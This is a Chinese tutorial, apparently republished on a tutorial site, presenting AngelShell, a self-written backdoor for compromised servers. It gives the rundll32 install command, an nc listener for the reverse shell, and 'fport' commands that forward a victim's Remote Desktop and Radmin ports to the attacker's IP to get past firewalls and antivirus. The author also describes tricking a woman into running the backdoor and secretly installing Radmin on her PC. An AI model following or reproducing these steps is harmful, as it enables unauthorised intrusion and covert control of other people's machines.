AngelShell:让所有正向程序实现反向连接(应用篇)_漏洞研究教程-查字典教程网
AngelShell:让所有正向程序实现反向连接(应用篇)
AngelShell:让所有正向程序实现反向连接(应用篇)
发布时间:2016-12-26 来源:查字典编辑
摘要:现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫兴啊!什么终端服务、什么Radmin之类的控方式想都不...

现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫兴啊!什么终端服务、什么Radmin之类的控方式想都不要想。试了试,发现几乎都支持反向连接,正向连接只能连接80和21端口,连1433都连不上。那就传个反向的后门上去吧,一传上去就被杀毒软件Kill了。一气之下,搬出Delphi,自己动手写后门!花了几天的时间,后门终于写好了,也达到了理想中的要求,使用效果非常不错,足以称为硬件防火墙和内网肉鸡的噩梦了!不敢独享,赶紧拿出来给大家共同分享一下。

这个程序叫AngelShell,这里用我的肉鸡和自己使用的计算机做测试。首先需要在本地配置一个记载反向连接信息的文件,第一行是自己的IP,第二行是用NC监听的端口。写好后把它放到HTTP空间上,然后进行配置:配置好密码和你刚才上传到FTP空间里的HTTP访问地址。

你可以选择生成DLL的服务端或者EXE的服务端,其中EXE的服务端直接运行即可安装,而DLL的服务端则需要用如下命令安装:“rundll32dll路径,I”,记得最后一个I一定要大写。

小提示:程序作者其实是为了方便大家才提供的EXE服务端,其本质也是安装DLL程序,只不过是用程序来解包并自动实现安装。

这里我以DLL服务端来示范。先把DLL传到心爱的肉鸡上面,然后在命令行上面打入:“rundll32angel.dll,I”。注意这里我是通过FTP连接上肉鸡的,为了方便就直接用FTP的命令行安装了。

装好以后,在自己的机器上用:“nc–v–l–p7787”监听7787端口,也就是我最开始写的配置文件里的端口。过了一会NC就提示有信息传输,输入密码敲回车,OK,连接成功。帮助信息显示后,可爱的Shell出来了。

小提示:这个后门还提供了一些附加命令,可以直接在Shell中执行。作者为了避免与已有的程序名冲突,所以附加命令全部为小写。

讲到这里,大家也许会觉得偶这款后门除了可以生成EXE服务端以外,也没什么特别的。当然,就这些功能当然不够打造出我的特色,也不能算是硬件防火墙的噩梦。我们这次用的后门,不仅是要让它自己能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、Radmin、MSSQL等等!呵呵,不要吃惊,好戏正在后头呢,偶不会让大家失望的,Let'sGO!

看到Shell里的Fport附加命令没有?也就是端口转发,它可以把远程计算机的任意端口反向模拟到本地来。什么?你没懂?呵呵,没关系,往下看就知道了。我们先来测试一下Windows的终端服务。这台肉鸡以前就被我开过终端服务了,但一直苦于硬件防火墙的拦截而无法连接,今天要好好爽一下!

小知识:Fport的用法:

fport

其中参数localport是指你在肉鸡上要转发的端口,YourIP是你的IP(或域名,YourPort是指你的客户端上监听的端口。

打开客户端,在“要模拟的端口”上面填3389,在“连接远程计算机的端口”上任意填,当然不要与已开的端口冲突,这里我填7788,然后点“开始监听”。赶紧到肉鸡的Shell下面敲入:“fport338961.187.***.***7788”。其中3389是肉鸡的终端服务的端口,7788是我们这边这个连接远程计算机的端口。然后客户端上马上提示已接收到远程计算机的连接,提示此时已经可以连接本地的3389端口了。这样我们就把肉鸡上的3389端口搬到自己的爱机上来了。

朋友们,我们还等什么呢?打开终端服务登录器,IP填上本地的127.0.0.1,连接,客户端马上显示已经成功建立了一个新的连接,并出现了远程桌面登录的对话框,我心里那个激动啊,真是语言无法表达!

我们再试试登录两个用户,客户端又显示成功建立了一个新的连接。事实证明,同时登录2个用户也成功了!当然,如果你愿意的话可以登录更多的用户,我编程的时候设置的每个连接都通过2个线程来进行数据传输,所以在传输速度方面是有保障的。

正沉浸在喜悦中时,电话响了,原来是一位MM买了摄像头,叫我去帮她装,这也要去?于是叫她上QQ,正好给偶再测试一次。这位MM虽然没有硬件级的防火墙,但是她在内网,用的是WindowsXP专业版。我先把EXE的服务端传给她,叫她运行,然后在本地进行监听,过一会就提示收到信息并需要输入密码。输入密码后得到了一个Shell,再用文件下载功能给她安装一个Radmin,够阴险吧!然后敲入如下命令:“fport489961.187.***.***7788”,将她的4899端口转发到我的4899端口来,然后在本地打开RadminViewer,连接IP写127.0.0.1,端口就用默认的4899,成功连接!。

帮她打开设备管理器,三下五除二装好了摄相头驱动程序,MM还楞在那不知道怎么回事,哈哈,等她反应过来后那个崇拜啊!非吵着要拜我为师,汗……测试到这里也就结束了,心里的痛快就别提了,呵呵!

该程序理论上是支持任何协议的,但是由于某些协议的特殊性,它会对IP进行验证,所以可能会达不到我们想要的效果。比如WEB服务,今天本来把肉鸡上的80端口转过来了,想骗骗别人说自己开了个网站。结果一连上来却显示什么:“Noweb……inthis……”,大概意思就是这个地址没有WEB服务,这才想起HTTP协议中还有个Host的值不符合,难怪。

最后说一下关于在内网中使用本程序的方法。如果自己在内网的话,需要一台允许正向连接的肉鸡来做中转,把要转的那台服务器的端口转到这个中转肉鸡上,然后直接连接这个中转肉鸡就相当于连接服务器了!

好了,希望这篇文章能给大家带来帮助,朋友们能看到这里,我也已经很感谢了。最后祝大家永远开心,技术蒸蒸日上!

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类